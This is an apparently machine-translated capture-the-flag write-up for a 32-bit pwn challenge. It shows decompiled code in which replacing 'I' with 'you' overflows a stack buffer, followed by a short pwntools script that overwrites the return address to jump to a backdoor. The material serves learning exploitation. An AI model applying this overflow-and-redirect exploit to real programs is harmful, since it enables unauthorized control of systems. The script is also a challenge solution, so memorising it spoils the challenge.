[BMZCTF-pwn] 11-pwn111111

There is still no remote environment , However, this stack overflow is related to libc It's not a big deal .

The program is hard to understand , notice replace Here should be input I convert to YOU. I tried it, and it turned out to be . use gdb After follow-up, I found that 60 Bytes of space will be input 32 After byte replacement, it is filled and overflowed , But the overflow is not too big , Even if you put ebp Add in 21 individual I The simplest vulnerability cannot be reached after replacement rop（plt.puts,ret,got.puts） The length of . Then look back , Here is a door , Just overflow directly and write the back door .

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v5);
  std::string::string(v4, "you", &v5);
  std::allocator<char>::allocator(v7);
  std::string::string(v6, "I", v7);
  replace((std::string *)v3);                   //  hold I Replace with YOU
  std::string::operator=(&input, v3, v6, v4);
  std::string::~string(v3);
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

from pwn import *

p = process('./pwn')
context(arch='i386', log_level='debug')

p.sendline(b'I'*20+b'XXXX'+p32(0x8048f0d))
p.recv()

p.interactive()